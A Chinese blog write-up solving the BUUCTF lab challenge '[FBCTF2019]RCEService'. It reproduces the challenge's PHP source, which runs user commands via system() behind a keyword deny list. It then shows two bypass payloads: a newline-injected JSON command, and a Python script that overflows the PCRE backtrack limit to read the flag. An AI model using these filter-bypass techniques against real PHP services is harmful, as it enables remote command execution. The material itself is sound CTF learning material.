[FBCTF2019]RCEService

最新推荐文章于 2024-03-13 21:36:43 发布
最新推荐文章于 2024-03-13 21:36:43 发布
阅读量742 收藏
点赞数
分类专栏: BUUCTF 文章标签: preg 环境变量 回溯限制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124079006
版权 
知识点:json格式,GET传参上限,换行绕preg,超回溯上限绕preg

开头给了个框让我们输入json格式。
在这里插入图片描述
输入{“cmd”:“ls”}注意:json格式用双引号包裹起来
在这里插入图片描述

但cat的时候就报错了,{“cmd”:“cat index.php”},像其他tac,nl…都不行。
在这里插入图片描述
看了其他人的wp,这个虚空源码很迷,不知道咋过来的。

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];

    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}

?>

因为它开头就设置了环境变量,所以我们读文件的时候要用绝对路径。

且过滤了很多,但是它是匹配整个字符串,也就是匹配开头和结尾,那意味着我们可以用%0a绕过,因为preg_match这边不是多行匹配,所以在匹配的时候不会匹配%0a,但是%0a又存在所以会绕过。
preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json))

又因为它改了环境变量,所以我们只能用绝对路径来调用系统命令

cat命令在/bin中保存

构造payload,{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0a},成功拿到flag
在这里插入图片描述

还有一种方法,就是用preg_match的回溯限制,长度为一百万,来绕过preg_match,因为当preg_match匹配的字符串太长的时候就会返回1,差不多就是这个意思。

详细请看: https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html

这里还有一个要注意的点就是,get传参是由长度限制,各个浏览器都不同,但肯定没有一百万,所以我们要用post提交

import requests
url = 'http://879f19e5-f850-4bf5-a4fb-bea23ce10945.node4.buuoj.cn:81/'
payload = {
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","succ3":"'+'a'*1000000+'"}'
}
r = requests.post(url=url,data=payload)
print(r.text)
succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
探索Facebook的开源CTF平台:FBCTF
gitblog_00088的博客
03-20 359
探索Facebook的开源CTF平台:FBCTF 项目地址:https://gitcode.com/facebookarchive/fbctf 在网络安全教育和实践中,Capture The Flag(CTF)是一种流行的形式,它允许参与者通过解决各种安全挑战来提升技能。Facebook开源的FBCTF是一个完全托管式的CTF平台,旨在帮助组织者轻松创建和管理CTF竞赛。本文将深入探讨FBC...
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia
weixin_44016181的博客
10-11 189
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia,BUU两道web练习题的WP。
BUU [FBCTF2019]RCEService
最新发布
Jay17的博客
03-13 521
BUU [FBCTF2019]RCEService
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-05
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
NetScream(网络加速软件) v1.8.4.2014 官方正式版.zip
07-15
NetScream是一款优化你的modem连接速率的工具。NetScream能提高你的internet连接速度,NetScream官方正式版是目前市场上最佳的modem优化工具之一,能极好地提高你的modem的下载/上传速度。它非常易于使用,完全兼容...
图片滚动加载
07-12
图片懒加载
feedblitz汉化操作平台
07-22
魔力闪电 feedblitz汉化操作平台
[FBCTF2019]RCEService_WP
Accompany的博客
01-30 296
分析 文章目录分析源码题解 Enter command as JSON: 这便是打开页面的提示了,需要提交命令以JSON的形式,所以在这里先了解一下JSON是什么 了解于此 简单来说形式如下:{名称:值} 检验成功,下来便是通过命令执行获取flag了 接着其实是想cat源码看一看,毕竟一个RCE肯定会有许多过滤,但不管怎样cat,以见过的绕过方式去尝试都是没有回显的,便去看了各位师傅的wp,都说是网上搜的源码,咱也不明白咋来的,就直接奉上吧 源码 <?php putenv('PATH=/ho
buu-[FBCTF2019]RCEService
qq_53271625的博客
08-13 278
buu-[FBCTF2019]RCEService 知识点: linux命令的使用和目录查询 preg_match()函数的绕过 P神:PHP利用PCRE回溯次数限制绕过某些安全限制 wp 根据题目的提示,应该就是利用json数据造成远程rce,先小试一下 {"cmd":"ls"} 发现可以显示,然后尝试其它危险函数,发现都没ban了,卡了好久,无奈查看别的大师傅的wp,原来有源码! <?php putenv('PATH=/home/rceservice/jail'); if (isset(
FBCTF 搭建部署全纪实
single7_的博客
10-23 1024
FBCTF 搭建部署全纪实 缘由 最近有点小需求需要搭建一个CTF平台,打架可以看看前期CTF平台上的探索,最后决定为FBCTF。选择FBCTF并不代表该项目为最优秀,只是考虑到最佳效果。废话少说,现在我们开始部署。 数据库部分 部署的过程放着不说,先把数据库部分完成,数据库本身没有开放远程登录功能。 1.使用root用户登录到数据库中,修改用户登录范围,将红框中的值根据实际情况修改为% 2.登陆不上查看防火墙配置。 3.再登录不上查看端口监听状态。发现 3306 绑定了 127.0.0.1 修改 my
开源的CTF比赛平台有那些
03-25
3. FBCTF (https://github.com/facebook/fbctf) 4. RootTheBox (https://github.com/moloch--/RootTheBox) 5. HackTheBox platform (https://github.com/HackTheBox/htb-frontend) 6. Metasploitable 3 CTF platform...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值